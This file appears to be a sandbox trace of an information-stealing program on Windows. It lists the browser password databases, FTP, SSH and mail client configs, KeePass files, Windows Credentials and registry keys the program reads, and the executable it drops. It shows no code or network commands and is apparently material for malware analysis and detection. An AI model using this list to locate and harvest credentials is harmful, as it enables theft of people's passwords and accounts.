C:\Users\Louise\AppData\Local\Temp\api-ms-win-crt-multibyte-l1-1-0.dll
C:\Windows\System32\api-ms-win-crt-multibyte-l1-1-0.dll
C:\Users\Louise\AppData\Local\Temp\api-ms-win-crt-time-l1-1-0.dll
C:\Windows\System32\api-ms-win-crt-time-l1-1-0.dll
C:\Users\Louise\AppData\Local\Temp\api-ms-win-crt-filesystem-l1-1-0.dll
C:\Windows\System32\api-ms-win-crt-filesystem-l1-1-0.dll
C:\Users\Louise\AppData\Local\Temp\api-ms-win-crt-environment-l1-1-0.dll
C:\Windows\System32\api-ms-win-crt-environment-l1-1-0.dll
C:\Users\Louise\AppData\Local\Temp\api-ms-win-crt-utility-l1-1-0.dll
C:\Windows\System32\api-ms-win-crt-utility-l1-1-0.dll
C:\Users\Louise\AppData\Local\Temp\WINMM.dll
C:\Windows\System32\winmm.dll
C:\Users\Louise\AppData\Local\Temp\WSOCK32.dll
C:\Windows\System32\wsock32.dll
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\profiles.ini
C:\Program Files (x86)\Mozilla Firefox\softokn3.dll
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\pkcs11.txt
C:\Program Files (x86)\Mozilla Firefox\freebl3.dll
C:\Windows\System32\api-ms-win-core-sysinfo-l1-2-1.DLL
C:\
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\cert9.db
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\cert9.db-journal
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\cert9.db-wal
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\key4.db
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\key4.db-journal
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\key4.db-wal
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\nssckbi.dll
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\signons.sqlite
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\logins.json
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\signons.txt
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\signons2.txt
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\signons3.txt
C:\Program Files\NETGATE\Black Hawk
C:\Program Files (x86)\Lunascape\Lunascape6\plugins\{9BDD5314-20A6-4d98-AB30-8325A95771EE}
C:\Users\Louise\AppData\Local\Comodo\Dragon\User Data\Default\Login Data
C:\Users\Louise\AppData\Local\Comodo\Dragon\User Data\Default\Web Data
C:\Users\Louise\AppData\LocalComodo\Dragon\Login Data
C:\Users\Louise\AppData\LocalComodo\Dragon\Default\Login Data
C:\Users\Louise\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Login Data
C:\Users\Louise\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Web Data
C:\Users\Louise\AppData\LocalMapleStudio\ChromePlus\Login Data
C:\Users\Louise\AppData\LocalMapleStudio\ChromePlus\Default\Login Data
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\Login Data
C:\Users\Louise\AppData\Local\Nichrome\User Data\Default\Login Data
C:\Users\Louise\AppData\Local\Nichrome\User Data\Default\Web Data
C:\Users\Louise\AppData\LocalNichrome\Login Data
C:\Users\Louise\AppData\LocalNichrome\Default\Login Data
C:\Users\Louise\AppData\Local\RockMelt\User Data\Default\Login Data
C:\Users\Louise\AppData\Local\RockMelt\User Data\Default\Web Data
C:\Users\Louise\AppData\LocalRockMelt\Login Data
C:\Users\Louise\AppData\LocalRockMelt\Default\Login Data
C:\Users\Louise\AppData\Local\Spark\User Data\Default\Login Data
C:\Users\Louise\AppData\Local\Spark\User Data\Default\Web Data
C:\Users\Louise\AppData\LocalSpark\Login Data
C:\Users\Louise\AppData\LocalSpark\Default\Login Data
C:\Users\Louise\AppData\Local\Chromium\User Data\Default\Login Data
C:\Users\Louise\AppData\Local\Chromium\User Data\Default\Web Data
C:\Users\Louise\AppData\LocalChromium\Login Data
C:\Users\Louise\AppData\LocalChromium\Default\Login Data
C:\Users\Louise\AppData\Local\Titan Browser\User Data\Default\Login Data
C:\Users\Louise\AppData\Local\Titan Browser\User Data\Default\Web Data
C:\Users\Louise\AppData\LocalTitan Browser\Login Data
C:\Users\Louise\AppData\LocalTitan Browser\Default\Login Data
C:\Users\Louise\AppData\Local\Torch\User Data\Default\Login Data
C:\Users\Louise\AppData\Local\Torch\User Data\Default\Web Data
C:\Users\Louise\AppData\LocalTorch\Login Data
C:\Users\Louise\AppData\LocalTorch\Default\Login Data
C:\Users\Louise\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data
C:\Users\Louise\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Data
C:\Users\Louise\AppData\LocalYandex\YandexBrowser\Login Data
C:\Users\Louise\AppData\LocalYandex\YandexBrowser\Default\Login Data
C:\Users\Louise\AppData\Local\Epic Privacy Browser\User Data\Default\Login Data
C:\Users\Louise\AppData\Local\Epic Privacy Browser\User Data\Default\Web Data
C:\Users\Louise\AppData\LocalEpic Privacy Browser\Login Data
C:\Users\Louise\AppData\LocalEpic Privacy Browser\Default\Login Data
C:\Users\Louise\AppData\Local\CocCoc\Browser\User Data\Default\Login Data
C:\Users\Louise\AppData\Local\CocCoc\Browser\User Data\Default\Web Data
C:\Users\Louise\AppData\LocalCocCoc\Browser\Login Data
C:\Users\Louise\AppData\LocalCocCoc\Browser\Default\Login Data
C:\Users\Louise\AppData\Local\Vivaldi\User Data\Default\Login Data
C:\Users\Louise\AppData\Local\Vivaldi\User Data\Default\Web Data
C:\Users\Louise\AppData\LocalVivaldi\Login Data
C:\Users\Louise\AppData\LocalVivaldi\Default\Login Data
C:\Users\Louise\AppData\Local\Comodo\Chromodo\User Data\Default\Login Data
C:\Users\Louise\AppData\Local\Comodo\Chromodo\User Data\Default\Web Data
C:\Users\Louise\AppData\LocalComodo\Chromodo\Login Data
C:\Users\Louise\AppData\LocalComodo\Chromodo\Default\Login Data
C:\Users\Louise\AppData\Local\Superbird\User Data\Default\Login Data
C:\Users\Louise\AppData\Local\Superbird\User Data\Default\Web Data
C:\Users\Louise\AppData\LocalSuperbird\Login Data
C:\Users\Louise\AppData\LocalSuperbird\Default\Login Data
C:\Users\Louise\AppData\Local\Coowon\Coowon\User Data\Default\Login Data
C:\Users\Louise\AppData\Local\Coowon\Coowon\User Data\Default\Web Data
C:\Users\Louise\AppData\LocalCoowon\Coowon\Login Data
C:\Users\Louise\AppData\LocalCoowon\Coowon\Default\Login Data
C:\Users\Louise\AppData\Local\Mustang Browser\User Data\Default\Login Data
C:\Users\Louise\AppData\Local\Mustang Browser\User Data\Default\Web Data
C:\Users\Louise\AppData\LocalMustang Browser\Login Data
C:\Users\Louise\AppData\LocalMustang Browser\Default\Login Data
C:\Users\Louise\AppData\Local\360Browser\Browser\User Data\Default\Login Data
C:\Users\Louise\AppData\Local\360Browser\Browser\User Data\Default\Web Data
C:\Users\Louise\AppData\Local360Browser\Browser\Login Data
C:\Users\Louise\AppData\Local360Browser\Browser\Default\Login Data
C:\Users\Louise\AppData\Local\CatalinaGroup\Citrio\User Data\Default\Login Data
C:\Users\Louise\AppData\Local\CatalinaGroup\Citrio\User Data\Default\Web Data
C:\Users\Louise\AppData\LocalCatalinaGroup\Citrio\Login Data
C:\Users\Louise\AppData\LocalCatalinaGroup\Citrio\Default\Login Data
C:\Users\Louise\AppData\Local\Google\Chrome SxS\User Data\Default\Login Data
C:\Users\Louise\AppData\Local\Google\Chrome SxS\User Data\Default\Web Data
C:\Users\Louise\AppData\LocalGoogle\Chrome SxS\Login Data
C:\Users\Louise\AppData\LocalGoogle\Chrome SxS\Default\Login Data
C:\Users\Louise\AppData\Local\Orbitum\User Data\Default\Login Data
C:\Users\Louise\AppData\Local\Orbitum\User Data\Default\Web Data
C:\Users\Louise\AppData\LocalOrbitum\Login Data
C:\Users\Louise\AppData\LocalOrbitum\Default\Login Data
C:\Users\Louise\AppData\Local\Iridium\User Data\Default\Login Data
C:\Users\Louise\AppData\Local\Iridium\User Data\Default\Web Data
C:\Users\Louise\AppData\LocalIridium\Login Data
C:\Users\Louise\AppData\LocalIridium\Default\Login Data
C:\Users\Louise\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Login Data
C:\Users\Louise\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Web Data
C:\Users\Louise\AppData\Roaming\Opera\Opera Next\data\Login Data
C:\Users\Louise\AppData\Roaming\Opera\Opera Next\data\Default\Login Data
C:\Users\Louise\AppData\Roaming\Opera Software\Opera Stable\User Data\Default\Login Data
C:\Users\Louise\AppData\Roaming\Opera Software\Opera Stable\User Data\Default\Web Data
C:\Users\Louise\AppData\Roaming\Opera Software\Opera Stable\Login Data
C:\Users\Louise\AppData\Roaming\Opera Software\Opera Stable\Default\Login Data
C:\Users\Louise\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\User Data\Default\Login Data
C:\Users\Louise\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\User Data\Default\Web Data
C:\Users\Louise\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\Login Data
C:\Users\Louise\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\Default\Login Data
C:\Users\Louise\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\User Data\Default\Login Data
C:\Users\Louise\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\User Data\Default\Web Data
C:\Users\Louise\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\Login Data
C:\Users\Louise\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\Default\Login Data
C:\Users\Louise\AppData\Local\QupZilla\profiles\default\browsedata.db
C:\Users\Louise\AppData\Roaming\Opera
C:\Users\Louise\AppData\Roaming\.purple\accounts.xml
C:\Users\Louise\Documents\SuperPutty
C:\Program Files (x86)\FTPShell\ftpshell.fsi
C:\Users\Louise\AppData\Roaming\Notepad++\plugins\config\NppFTP\NppFTP.xml
C:\Program Files (x86)\oZone3D\MyFTP\myftp.ini
C:\Users\Louise\AppData\Roaming\FTPBox\profiles.conf
C:\Program Files (x86)\Sherrod Computers\sherrod FTP\favorites
C:\Program Files (x86)\FTP Now\sites.xml
C:\Program Files (x86)\NexusFile\userdata\ftpsite.ini
C:\Users\Louise\AppData\Roaming\NexusFile\ftpsite.ini
C:\Users\Louise\Documents\NetSarang\Xftp\Sessions
C:\Users\Louise\AppData\Roaming\NetSarang\Xftp\Sessions
C:\Program Files (x86)\EasyFTP\data
C:\Users\Louise\AppData\Roaming\SftpNetDrive
C:\Program Files (x86)\AbleFTP7\encPwd.jsd
C:\Program Files (x86)\AbleFTP7\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP7\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP8\encPwd.jsd
C:\Program Files (x86)\AbleFTP8\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP8\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP9\encPwd.jsd
C:\Program Files (x86)\AbleFTP9\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP9\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP10\encPwd.jsd
C:\Program Files (x86)\AbleFTP10\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP10\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP11\encPwd.jsd
C:\Program Files (x86)\AbleFTP11\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP11\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP12\encPwd.jsd
C:\Program Files (x86)\AbleFTP12\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP12\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP13\encPwd.jsd
C:\Program Files (x86)\AbleFTP13\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP13\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP14\encPwd.jsd
C:\Program Files (x86)\AbleFTP14\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP14\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp7\encPwd.jsd
C:\Program Files (x86)\JaSFtp7\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp7\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp8\encPwd.jsd
C:\Program Files (x86)\JaSFtp8\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp8\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp9\encPwd.jsd
C:\Program Files (x86)\JaSFtp9\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp9\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp10\encPwd.jsd
C:\Program Files (x86)\JaSFtp10\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp10\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp11\encPwd.jsd
C:\Program Files (x86)\JaSFtp11\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp11\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp12\encPwd.jsd
C:\Program Files (x86)\JaSFtp12\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp12\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp13\encPwd.jsd
C:\Program Files (x86)\JaSFtp13\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp13\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp14\encPwd.jsd
C:\Program Files (x86)\JaSFtp14\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp14\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize7\encPwd.jsd
C:\Program Files (x86)\Automize7\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize7\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize8\encPwd.jsd
C:\Program Files (x86)\Automize8\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize8\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize9\encPwd.jsd
C:\Program Files (x86)\Automize9\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize9\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize10\encPwd.jsd
C:\Program Files (x86)\Automize10\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize10\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize11\encPwd.jsd
C:\Program Files (x86)\Automize11\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize11\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize12\encPwd.jsd
C:\Program Files (x86)\Automize12\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize12\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize13\encPwd.jsd
C:\Program Files (x86)\Automize13\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize13\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize14\encPwd.jsd
C:\Program Files (x86)\Automize14\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize14\data\settings\ftpProfiles-j.jsd
C:\Users\Louise\AppData\Roaming\Cyberduck
C:\Users\Louise\AppData\Roaming\iterate_GmbH
C:\Users\Louise\.config\fullsync\profiles.xml
C:\Users\Louise\AppData\Roaming\FTPInfo\ServerList.xml
C:\Users\Louise\AppData\Roaming\FTPInfo\ServerList.cfg
C:\Program Files (x86)\FileZilla\Filezilla.xml
C:\Users\Louise\AppData\Roaming\FileZilla\filezilla.xml
C:\Users\Louise\AppData\Roaming\FileZilla\recentservers.xml
C:\Users\Louise\AppData\Roaming\FileZilla\sitemanager.xml
C:\Program Files (x86)\Staff-FTP\sites.ini
C:\Users\Louise\AppData\Roaming\BlazeFtp\site.dat
C:\Program Files (x86)\Fastream NETFile\My FTP Links
C:\Program Files (x86)\GoFTP\settings\Connections.txt
C:\Users\Louise\AppData\Roaming\Estsoft\ALFTP\ESTdb2.dat
C:\Program Files (x86)\DeluxeFTP\sites.xml
C:\Windows\wcx_ftp.ini
C:\Users\Louise\AppData\Roaming\wcx_ftp.ini
C:\Users\Louise\wcx_ftp.ini
C:\Users\Louise\AppData\Roaming\GHISLER\wcx_ftp.ini
C:\Program Files (x86)\FTPGetter\Profile\servers.xml
C:\Users\Louise\AppData\Roaming\FTPGetter\servers.xml
C:\Program Files (x86)\WS_FTP\WS_FTP.INI
C:\Windows\WS_FTP.INI
C:\Users\Louise\AppData\Roaming\Ipswitch
C:\Users\Louise\site.xml
C:\Users\Louise\AppData\Local\PokerStars*
C:\Users\Louise\AppData\Local\ExpanDrive
C:\Users\Louise\AppData\Roaming\Steed\bookmarks.txt
C:\Users\Louise\AppData\Roaming\FlashFXP
C:\ProgramData\FlashFXP
C:\Users\Louise\AppData\Local\INSoftware\NovaFTP\NovaFTP.db
C:\Users\Louise\AppData\Roaming\NetDrive\NDSites.ini
C:\Users\Louise\AppData\Roaming\NetDrive2\drives.dat
C:\ProgramData\NetDrive2\drives.dat
C:\Users\Louise\AppData\Roaming\SmartFTP
C:\Users\Louise\AppData\Roaming\Far Manager\Profile\PluginsData\42E4AEB1-A230-44F4-B33C-F195BB654931.db
C:\Users\Louise\Documents\*.tlp
C:\Users\Louise\Documents\*.bscp
C:\Users\Louise\Documents\*.vnc
C:\Users\Louise\Desktop\*.vnc
C:\Users\Louise\Documents\mSecure
C:\ProgramData\Syncovery
C:\Program Files (x86)\FreshWebmaster\FreshFTP\FtpSites.SMF
C:\Users\Louise\AppData\Roaming\BitKinex\bitkinex.ds
C:\Users\Louise\AppData\Roaming\UltraFXP\sites.xml
C:\Users\Louise\AppData\Roaming\FTP Now\sites.xml
C:\Program Files (x86)\Odin Secure FTP Expert\QFDefault.QFQ
C:\Program Files (x86)\Odin Secure FTP Expert\SiteInfo.QFP
C:\Program Files (x86)\Mozilla Thunderbird
C:\Program Files (x86)\Mozilla Thunderbird\nss3.dll
C:\Program Files (x86)\Mozilla Thunderbird\mozglue.dll
C:\Program Files (x86)\Mozilla Thunderbird\sqlite3.dll
C:\Program Files (x86)\Mozilla Thunderbird\mozsqlite3.dll
C:\Users\Louise\AppData\Roaming\Thunderbird\profiles.ini
C:\Program Files (x86)\Foxmail\mail
C:\Foxmail*
C:\Users\Louise\AppData\Roaming\Pocomail\accounts.ini
C:\Users\Louise\Documents\Pocomail\accounts.ini
C:\Users\Louise\AppData\Roaming\GmailNotifierPro\ConfigData.xml
C:\Users\Louise\AppData\Roaming\DeskSoft\CheckMail
C:\Program Files (x86)\WinFtp Client\Favorites.dat
C:\Windows\32BitFtp.TMP
C:\Windows\32BitFtp.ini
C:\FTP Navigator\Ftplist.txt
C:\Softwarenetz\Mailing\Daten\mailing.vdt
C:\Users\Louise\AppData\Roaming\Opera Mail\Opera Mail\wand.dat
C:\Users\Louise\Documents\*Mailbox.ini
C:\Users\Louise\Documents\yMail2\POP3.xml
C:\Users\Louise\Documents\yMail2\SMTP.xml
C:\Users\Louise\Documents\yMail2\Accounts.xml
C:\Users\Louise\Documents\yMail\ymail.ini
C:\Users\Louise\AppData\Roaming\TrulyMail\Data\Settings\user.config
C:\Users\Louise\Documents\*.spn
C:\Users\Louise\Desktop\*.spn
C:\Users\Louise\AppData\Roaming\To-Do DeskList\tasks.db
C:\Users\Louise\AppData\Roaming\stickies\images
C:\Users\Louise\AppData\Roaming\stickies\rtf
C:\Users\Louise\AppData\Roaming\NoteFly\notes
C:\Users\Louise\AppData\Roaming\Conceptworld\Notezilla\Notes8.db
C:\Users\Louise\AppData\Roaming\Microsoft\Sticky Notes\StickyNotes.snt
C:\Users\Louise\Documents
C:\Users\Louise\Documents\*.kdbx
C:\Users\Louise\Desktop
C:\Users\Louise\Desktop\*.kdbx
C:\Users\Louise\Documents\*.kdb
C:\Users\Louise\Desktop\*.kdb
C:\Users\Louise\Documents\Enpass
C:\Users\Louise\Documents\My RoboForm Data
C:\Users\Louise\Documents\1Password
C:\Users\Louise\AppData\Local\Temp\Mikrotik\Winbox
C:\Users\Louise\AppData\Local\Temp\NETAPI32.DLL
C:\Windows\System32\netapi32.dll
C:\Users\Louise\AppData\Local\Temp\netutils.dll
C:\Windows\System32\netutils.dll
C:\Users\Louise\AppData\Local\Temp\srvcli.dll
C:\Windows\System32\srvcli.dll
C:\Users\Louise\AppData\Roaming\E5A3EA
C:\Users\Louise\AppData\Roaming\E5A3EA\ACE282.lck
C:\Users\Louise\AppData\Roaming\Microsoft\Credentials
C:\Users\Louise\AppData\Roaming\Microsoft\Credentials\*
C:\Users\Louise\AppData\Local\Microsoft\Credentials
C:\Users\Louise\AppData\Local\Microsoft\Credentials\*
C:\Users\Louise\AppData\Local\Temp\gunzipped.exe
C:\Users\Louise\AppData\Roaming\E5A3EA\ACE282.exe
C:\Windows\Temp
C:\Windows\sysnative\LogFiles\Scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50
C:\Program Files (x86)\Mozilla Firefox\nss3.dll
C:\Program Files (x86)\Mozilla Firefox\mozglue.dll
C:\Windows\System32\version.dll
C:\Windows\System32\dbghelp.dll
C:\Windows\System32\msvcp140.dll
C:\Windows\System32\VCRUNTIME140.dll
C:\Windows\System32\api-ms-win-crt-runtime-l1-1-0.dll
C:\Windows\System32\ucrtbase.dll
C:\Windows\System32\api-ms-win-core-timezone-l1-1-0.dll
C:\Windows\System32\api-ms-win-core-file-l2-1-0.dll
C:\Windows\System32\api-ms-win-core-localization-l1-2-0.dll
C:\Windows\System32\api-ms-win-core-processthreads-l1-1-1.dll
C:\Windows\System32\api-ms-win-core-file-l1-2-0.dll
C:\Windows\System32\api-ms-win-crt-string-l1-1-0.dll
C:\Windows\System32\api-ms-win-crt-heap-l1-1-0.dll
C:\Windows\System32\api-ms-win-crt-stdio-l1-1-0.dll
C:\Windows\System32\api-ms-win-crt-convert-l1-1-0.dll
C:\Windows\System32\api-ms-win-crt-locale-l1-1-0.dll
C:\Windows\System32\api-ms-win-crt-math-l1-1-0.dll
C:\Windows\System32\api-ms-win-crt-multibyte-l1-1-0.dll
C:\Windows\System32\api-ms-win-crt-time-l1-1-0.dll
C:\Windows\System32\api-ms-win-crt-filesystem-l1-1-0.dll
C:\Windows\System32\api-ms-win-crt-environment-l1-1-0.dll
C:\Windows\System32\api-ms-win-crt-utility-l1-1-0.dll
C:\Windows\System32\winmm.dll
C:\Windows\System32\wsock32.dll
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\profiles.ini
C:\Program Files (x86)\Mozilla Firefox\softokn3.dll
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\pkcs11.txt
C:\Program Files (x86)\Mozilla Firefox\freebl3.dll
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\cert9.db
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\key4.db
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\logins.json
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\Login Data
C:\Program Files (x86)\Mozilla Thunderbird\nss3.dll
C:\Program Files (x86)\Mozilla Thunderbird\mozglue.dll
C:\Windows\System32\netapi32.dll
C:\Windows\System32\netutils.dll
C:\Windows\System32\srvcli.dll
C:\Users\Louise\AppData\Roaming\E5A3EA\ACE282.lck
C:\Windows\sysnative\LogFiles\Scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50
C:\Users\Louise\AppData\Roaming\E5A3EA\ACE282.lck
C:\Users\Louise\AppData\Roaming\E5A3EA\ACE282.exe
C:\Users\Louise\AppData\Roaming\E5A3EA\ACE282.lck
C:\Users\Louise\AppData\Local\Temp\gunzipped.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT
HKEY_CURRENT_USER
DisableUserModeCallbackFilter
HKEY_CURRENT_USER\Software\Borland\Locales
HKEY_LOCAL_MACHINE\Software\Borland\Locales
HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography
\x8ad0\x224EY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\75.0 (x86 en-GB)\Main
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\75.0 (x86 en-GB)\Main\Install Directory
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\SOFTWARE\ComodoGroup\IceDragon\Setup
HKEY_LOCAL_MACHINE\SOFTWARE\Apple Computer, Inc.\Safari
HKEY_LOCAL_MACHINE\SOFTWARE\K-Meleon
HKEY_LOCAL_MACHINE\SOFTWARE\mozilla.org\SeaMonkey
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\SeaMonkey
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Flock
HKEY_CURRENT_USER\Software\QtWeb.NET\QtWeb Internet Browser\AutoComplete
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2
HKEY_LOCAL_MACHINE\SOFTWARE\8pecxstudios\Cyberfox86
HKEY_LOCAL_MACHINE\SOFTWARE\8pecxstudios\Cyberfox
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Pale Moon
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Waterfox
HKEY_CURRENT_USER\Software\LinasFTP\Site Manager
HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
HKEY_CURRENT_USER\Software\Ghisler\Total Commander
HKEY_CURRENT_USER\Software
HKEY_CURRENT_USER\Software\7-Zip
HKEY_CURRENT_USER\Software\Adobe
HKEY_CURRENT_USER\Software\AppDataLow
HKEY_CURRENT_USER\Software\Clients
HKEY_CURRENT_USER\Software\Google
HKEY_CURRENT_USER\Software\IM Providers
HKEY_CURRENT_USER\Software\JavaSoft
HKEY_CURRENT_USER\Software\Macromedia
HKEY_CURRENT_USER\Software\Microsoft
HKEY_CURRENT_USER\Software\Mozilla
HKEY_CURRENT_USER\Software\Netscape
HKEY_CURRENT_USER\Software\ODBC
HKEY_CURRENT_USER\Software\Piriform
HKEY_CURRENT_USER\Software\Policies
HKEY_CURRENT_USER\Software\Python
HKEY_CURRENT_USER\Software\WinRAR
HKEY_CURRENT_USER\Software\WinRAR SFX
HKEY_CURRENT_USER\Software\Wow6432Node
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
HKEY_CURRENT_USER\Software\Bitvise\BvSshClient
HKEY_CURRENT_USER\Software\VanDyke\SecureFX
HKEY_LOCAL_MACHINE\Software\NCH Software\Fling\Accounts
HKEY_CURRENT_USER\Software\NCH Software\Fling\Accounts
HKEY_LOCAL_MACHINE\Software\NCH Software\ClassicFTP\FTPAccounts
HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions
HKEY_LOCAL_MACHINE\Software\SimonTatham\PuTTY\Sessions
HKEY_LOCAL_MACHINE\Software\9bis.com\KiTTY\Sessions
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Thunderbird
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Thunderbird\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Thunderbird\60.5.0 (en-US)\Main
